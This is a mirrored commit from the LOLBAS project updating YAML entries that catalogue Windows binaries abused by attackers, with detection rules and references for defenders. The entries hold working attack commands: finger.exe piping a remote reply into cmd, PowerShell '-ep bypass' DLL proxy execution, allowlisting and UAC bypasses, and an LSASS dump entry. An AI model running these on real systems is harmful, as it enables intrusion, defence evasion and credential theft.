public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-28 15:58:24 +01:00
Code Issues Projects Releases Wiki Activity

Adding more missed-out entries

Browse Source
This commit is contained in:
Wietze 2021-12-15 11:46:04 +00:00
parent 52302853c9
commit 085aaa37b1
No known key found for this signature in database
GPG Key ID: E17630129FF993CF
20 changed files with 268 additions and 268 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

62
yml/OSBinaries/Finger.yml
View File

@ -1,31 +1,31 @@
---
Name: Finger.exe
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
Author: Ruben Revuelta
Created: 2021-08-30
Commands:
- Command: finger user@example.host.com | more +2 | cmd
Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
Usecase: Download malicious payload
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
Full_Path:
- Path: c:\windows\system32\finger.exe
- Path: c:\windows\syswow64\finger.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
- IOC: finger.exe should not be run on a normal workstation.
- IOC: finger.exe connecting to external resources.
Resources:
- Link: https://twitter.com/DissectMalware/status/997340270273409024
- Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
Acknowledgement:
- Person: Ruben Revuelta (MAPFRE CERT)
Handle: '@rubn_RB'
- Person: Jose A. Jimenez (MAPFRE CERT)
Handle: '@Ocelotty6669'
- Person: Malwrologist
Handle: '@DissectMalware'
---
---
Name: Finger.exe
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
Author: Ruben Revuelta
Created: 2021-08-30
Commands:
- Command: finger user@example.host.com | more +2 | cmd
Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
Usecase: Download malicious payload
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
Full_Path:
- Path: c:\windows\system32\finger.exe
- Path: c:\windows\syswow64\finger.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
- IOC: finger.exe should not be run on a normal workstation.
- IOC: finger.exe connecting to external resources.
Resources:
- Link: https://twitter.com/DissectMalware/status/997340270273409024
- Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
Acknowledgement:
- Person: Ruben Revuelta (MAPFRE CERT)
Handle: '@rubn_RB'
- Person: Jose A. Jimenez (MAPFRE CERT)
Handle: '@Ocelotty6669'
- Person: Malwrologist
Handle: '@DissectMalware'
---

6
yml/OSBinaries/Microsoft.Workflow.Compiler.yml
View File

@ -10,21 +10,21 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10S
OperatingSystem: Windows 10S, Windows 11
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10S
OperatingSystem: Windows 10S, Windows 11
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10S
OperatingSystem: Windows 10S, Windows 11
Full_Path:
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Code_Sample:

2
yml/OSBinaries/Mmc.yml
View File

@ -17,7 +17,7 @@ Commands:
Category: UAC Bypass
Privileges: Administrator
MitreID: T1218.014
OperatingSystem: Windows 10 (and possibly earlier versions)
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
Full_Path:
- Path: C:\Windows\System32\mmc.exe
- Path: C:\Windows\SysWOW64\mmc.exe

4
yml/OSBinaries/Schtasks.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1053.005
OperatingSystem: Windows
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
Description: Create a scheduled task on a remote computer for persistence/lateral movement
Usecase: Create a remote task to run daily relative to the the time of creation
Category: Execute
Privileges: Administrator
MitreID: T1053.005
OperatingSystem: Windows 10, Windows 11
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\schtasks.exe
- Path: c:\windows\syswow64\schtasks.exe

2
yml/OSLibraries/Ieframe.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\ieframe.dll
- Path: c:\windows\syswow64\ieframe.dll

2
yml/OSLibraries/Mshtml.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\mshtml.dll
- Path: c:\windows\syswow64\mshtml.dll

2
yml/OSLibraries/Pcwutl.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\pcwutl.dll
- Path: c:\windows\syswow64\pcwutl.dll

2
yml/OSLibraries/Setupapi.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
UseCase: Load an executable payload.

2
yml/OSLibraries/Shdocvw.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\shdocvw.dll
- Path: c:\windows\syswow64\shdocvw.dll

4
yml/OSLibraries/Syssetup.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: AWL Bypass
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
Usecase: Load an executable payload.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\syssetup.dll
- Path: c:\windows\syswow64\syssetup.dll

12
yml/OSLibraries/Url.yml
View File

@ -10,42 +10,42 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url"
Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
Usecase: Load an executable payload by calling a .url file with or without quotes.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Description: Launch an executable by calling OpenURL.
Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe url.dll,FileProtocolHandler calc.exe
Description: Launch an executable by calling FileProtocolHandler.
Usecase: Launch an executable.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Description: Launch an executable by calling FileProtocolHandler.
Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
Description: Launch a HTML application payload by calling FileProtocolHandler.
Usecase: Invoke an HTML Application via mshta.exe (Default Handler).
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\url.dll
- Path: c:\windows\syswow64\url.dll

4
yml/OSLibraries/Zipfldr.yml
View File

@ -10,14 +10,14 @@ Commands:
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
- Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Description: Launch an executable payload by calling RouteTheCall (obfuscated).
Usecase: Launch an executable.
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\zipfldr.dll
- Path: c:\windows\syswow64\zipfldr.dll

2
yml/OSLibraries/comsvcs.yml
View File

@ -10,7 +10,7 @@ Commands:
Category: Dump
Privileges: SYSTEM
MitreID: T1003.001
OperatingSystem: Windows
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\comsvcs.dll
Code_Sample:

48
yml/OSScripts/CL_LoadAssembly.yml
View File

@ -1,24 +1,24 @@
---
Name: CL_LoadAssembly.ps1
Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"'
Description: Proxy execute Managed DLL with PowerShell
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Full_Path:
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
Code_Sample:
- Code:
Detection:
Resources:
- Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
---
---
Name: CL_LoadAssembly.ps1
Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"'
Description: Proxy execute Managed DLL with PowerShell
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Full_Path:
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
Code_Sample:
- Code:
Detection:
Resources:
- Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
---

48
yml/OSScripts/UtilityFunctions.yml
View File

@ -1,24 +1,24 @@
---
Name: UtilityFunctions.ps1
Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"'
Description: Proxy execute Managed DLL with PowerShell
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Full_Path:
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
Code_Sample:
- Code:
Detection:
Resources:
- Link: https://twitter.com/nickvangilder/status/1441003666274668546
Acknowledgement:
- Person: Nick VanGilder
Handle: '@nickvangilder'
---
---
Name: UtilityFunctions.ps1
Description: PowerShell Diagnostic Script
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: 'powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"'
Description: Proxy execute Managed DLL with PowerShell
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1216
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
Full_Path:
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
Code_Sample:
- Code:
Detection:
Resources:
- Link: https://twitter.com/nickvangilder/status/1441003666274668546
Acknowledgement:
- Person: Nick VanGilder
Handle: '@nickvangilder'
---

78
yml/OtherMSBinaries/Fsi.yml
View File

@ -1,39 +1,39 @@
---
Name: Fsi.exe
Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: fsi.exe c:\path\to\test.fsscript
Description: Execute F# code via script file
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
- Command: fsi.exe
Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
Code_Sample:
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
Detection:
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: Fsi.exe execution may be suspicious on non-developer machines
Resources:
- Link: https://twitter.com/NickTyrer/status/904273264385589248
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
- Person: Nick Tyrer
Handle: '@NickTyrer'
- Person: Jimmy
Handle: '@bohops'
---
---
Name: Fsi.exe
Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: fsi.exe c:\path\to\test.fsscript
Description: Execute F# code via script file
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
- Command: fsi.exe
Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
Code_Sample:
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
Detection:
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: Fsi.exe execution may be suspicious on non-developer machines
Resources:
- Link: https://twitter.com/NickTyrer/status/904273264385589248
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
- Person: Nick Tyrer
Handle: '@NickTyrer'
- Person: Jimmy
Handle: '@bohops'
---

70
yml/OtherMSBinaries/FsiAnyCpu.yml
View File

@ -1,35 +1,35 @@
---
Name: FsiAnyCpu.exe
Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: fsianycpu.exe c:\path\to\test.fsscript
Description: Execute F# code via script file
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
- Command: fsianycpu.exe
Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
Code_Sample:
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines
Resources:
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
- Person: Nick Tyrer
Handle: '@NickTyrer'
- Person: Jimmy
Handle: '@bohops'
---
---
Name: FsiAnyCpu.exe
Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: fsianycpu.exe c:\path\to\test.fsscript
Description: Execute F# code via script file
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
- Command: fsianycpu.exe
Description: Execute F# code via interactive command line
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
Code_Sample:
- Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines
Resources:
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
- Person: Nick Tyrer
Handle: '@NickTyrer'
- Person: Jimmy
Handle: '@bohops'
---

68
yml/OtherMSBinaries/Procdump.yml
View File

@ -1,34 +1,34 @@
---
Name: Procdump(64).exe
Description: SysInternals Memory Dump Tool
Author: 'Alfie Champion (@ajpc500)'
Created: 2020-10-14
Commands:
- Command: procdump.exe -md calc.dll explorer.exe
Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created.
Usecase: Performs execution of unsigned DLL.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
- Command: procdump.exe -md calc.dll foobar
Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
Usecase: Performs execution of unsigned DLL.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml
- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
- IOC: Process creation with given '-md' parameter
- IOC: Anomalous child processes of procdump
- IOC: Unsigned DLL load via procdump.exe or procdump64.exe
Resources:
- Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20
Acknowledgement:
- Name: Alfie Champion
Handle: '@ajpc500'
---
---
Name: Procdump(64).exe
Description: SysInternals Memory Dump Tool
Author: 'Alfie Champion (@ajpc500)'
Created: 2020-10-14
Commands:
- Command: procdump.exe -md calc.dll explorer.exe
Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created.
Usecase: Performs execution of unsigned DLL.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
- Command: procdump.exe -md calc.dll foobar
Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.
Usecase: Performs execution of unsigned DLL.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher.
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_susp_procdump.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/f36b1cbd2a3f1a7423f43a67a182549778700615/rules/windows/process_creation/win_procdump.yml
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml
- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
- IOC: Process creation with given '-md' parameter
- IOC: Anomalous child processes of procdump
- IOC: Unsigned DLL load via procdump.exe or procdump64.exe
Resources:
- Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20
Acknowledgement:
- Name: Alfie Champion
Handle: '@ajpc500'
---

62
yml/OtherMSBinaries/VisualUiaVerifyNative.yml
View File

@ -1,31 +1,31 @@
---
Name: VisualUiaVerifyNative.exe
Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: VisualUiaVerifyNative.exe
Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing.
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe
Code_Sample:
- Code:
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: As a Windows SDK binary, execution on a system may be suspicious
Resources:
- Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/
- Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad
Acknowledgement:
- Person: Lee Christensen
Handle: '@tifkin'
- Person: Jimmy
Handle: '@bohops'
---
---
Name: VisualUiaVerifyNative.exe
Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: VisualUiaVerifyNative.exe
Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing.
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe
- Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe
Code_Sample:
- Code:
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: As a Windows SDK binary, execution on a system may be suspicious
Resources:
- Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/
- Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad
Acknowledgement:
- Person: Lee Christensen
Handle: '@tifkin'
- Person: Jimmy
Handle: '@bohops'
---

56
yml/OtherMSBinaries/Wfc.yml
View File

@ -1,28 +1,28 @@
---
Name: Wfc.exe
Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: wfc.exe c:\path\to\test.xoml
Description: Execute arbitrary C# code embedded in a XOML file.
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
Code_Sample:
- Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: As a Windows SDK binary, execution on a system may be suspicious
Resources:
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
- Person: Jimmy
Handle: '@bohops'
---
---
Name: Wfc.exe
Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
Author: Jimmy (@bohops)
Created: 2021-09-26
Commands:
- Command: wfc.exe c:\path\to\test.xoml
Description: Execute arbitrary C# code embedded in a XOML file.
Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies
Category: AWL Bypass
Privileges: User
MitreID: T1127
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
Full_Path:
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
Code_Sample:
- Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: As a Windows SDK binary, execution on a system may be suspicious
Resources:
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
- Person: Jimmy
Handle: '@bohops'
---